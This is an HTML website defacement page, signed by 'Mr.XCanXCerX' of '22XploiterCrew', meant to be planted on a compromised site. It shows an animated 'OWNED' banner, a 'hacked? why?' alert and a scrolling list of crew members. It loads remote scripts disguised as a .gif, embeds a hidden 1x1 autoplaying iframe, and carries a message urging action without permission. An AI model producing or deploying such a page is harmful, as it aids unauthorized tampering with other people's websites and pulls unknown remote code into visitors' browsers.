<!DOCTYPE html>
<!-- Script Simple Kok Direcode? situ bercanda? -->
<!-- Thanks For My Team -->
<html>
<head>
	<title> Hacked By Mr.XCanXCerX</title>
 <script src="http://4.bp.blogspot.com/-uCke0VjpJII/VBdL9q2hxZI/AAAAAAAACrY/rrh2g6OLw4w/s1600/syahadat.gif" type="text/javascript"></script> 
<script src="http://4.bp.blogspot.com/-uCke0VjpJII/VBdL9q2hxZI/AAAAAAAACrY/rrh2g6OLw4w/s1600/syahadat.gif" type="text/javascript"></script>
<meta property="og:image"content="https://images8.alphacoders.com/740/740590.jpg">
<meta name="description" content="Mr.XCanXCerX@22XploiterCrew"> <meta name="keywords" content="Mr.XCanXCerX@22XploiterCrew"> 
<meta http-equiv="cache-control" content="index,cache"> 
<meta http-equiv="pragma" content="index,cache">
<style>
.error {
  text-align: center;
  font-family: 'Gilda Display', serif;
  -webkit-animation: noise-3 1s linear infinite;
          animation: noise-3 1s linear infinite;
  overflow: default;
}

.info {
  text-align: center;
  width: 200px;
  height: 60px;
  margin: auto;
  position: absolute;
  top: 280px;
  bottom: 0;
  left: 20px;
  right: 0;
  -webkit-animation: noise-3 1s linear infinite;
          animation: noise-3 1s linear infinite;
}


.info:after {
  content: 'OWNED';
  font-family: OCR-A;
  font-size: 100px;
  text-align: center;
  width: 800px;
  margin: auto;
  position: absolute;
  top: 20px;
  bottom: 0;
  left: 40px;
  right: 0;
  opacity: 0;
  color: white;
  -webkit-animation: noise-1 .2s linear infinite;
          animation: noise-1 .2s linear infinite;
}

@-webkit-keyframes noise-1 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: -6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: 2px;}
}

@keyframes noise-1 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: -6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: 2px;}
}

@-webkit-keyframes noise-2 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: 6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: -2px;}
}

@keyframes noise-2 {
  0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  10% {opacity: .1;}
  50% {opacity: .5; left: 6px;}
  80% {opacity: .3;}
  100% {opacity: .6; left: -2px;}
}

@-webkit-keyframes noise {
  0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}  
  4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
}

@keyframes noise {
  0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}  
  4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
}

@-webkit-keyframes noise-3 {
  0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
}

@keyframes noise-3 {
  0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
}

.wrap {
  top: 30%;
  left: 25%;
  
  height: 200px;
  
  margin-top: -100px;
  position: absolute;
}
code {
  color: white;
}
span.blue {
  color: #48beef;
}
span.comment {
  color: #7f8c8d;
}
span.orange {
  color: #f39c12;
}
span.green {
  color: #33cc33;
}

.viewFull {
  font-family:OCR-A;
  color:orange;
  text-decoration:;
}

	
}

 @media only screen and (min-height: 500px) {

.viewFull{
  display:none; 	
	}

}
</style>
</head>
<script>
alert ('hacked? why?')
</script>
<body bgcolor="white">
<body>
<link href='http://fonts.googleapis.com/css?family=Amatic SC' rel='stylesheet' type='text/css'>
<div class="error">
<center>
<img src="https://giffiles.alphacoders.com/207/207766.gif" width="40%">
<center>
<font size="10" face="Amatic SC" color="black">
Hacked By Mr.XCanXCerX</font><br><br>
<font size="8" face="Amatic SC" color="black">
22XploiterCrew</font><br><br>
<font size="5" face="Amatic SC" color="black">>Msg<<br>Jika Tidak Ada Izin, Ikutilah Insting, Lakukan Apa Yang Harus Dilakukan</font><br>-Bang L<br>
<br>
<font face ="Amatic SC" color="black" size="5"> Official Member:
</font><font size="5"><hr><marquee> ~root@666Lucifer - Parker'z Gans - ./HiraruKun  -  <font color='red'>Mr.XCanXCerX</font> - Synon_ - PHANTOMBLIZT - CtrGans - D4RK5H4D0W5 - . /AHMADG4N5_ - AwChicks - Mr. Cat's - Chiwa - Mr.NEWBIE_ - pseucode - pemeran pengganti - ./R4ND5 - CrakFIFE - MR.KVM1$ - Mr.R4SSOМypaBeñ - GomenKeun - XnuiXiunX - ./C4L4MITY - Mr.Boy
</marquee><hr>
<a href="https://www.google.com/search?q=Mr.XCanXCerX&oq=Mr.XCanXCerX&aqs=chrome..69i57j69i60l2.6156j0j4&client=ms-android-xiaomi&sourceid=chrome-mobile&ie=UTF-8"><font color="black" face="Amatic SC" size="4">Find Me?</a>
<br><br>
<a href="http://22xploitercrew.tech"><font color="black" size="4" face="Amatic SC">My Team?</font></a>
<br><br><br>
<div class="copyright"><font face="Amatic SC" color="black" size="5">&copy; 2019 Mr.XCanXCerX@22XploiterCrew
        </div>
<iframe width="1" height="1" src="https://g.top4top.net/m_1266pvv9n1.mp3" frameborder="0" allowfullscreen></iframe>
</body>
</html>
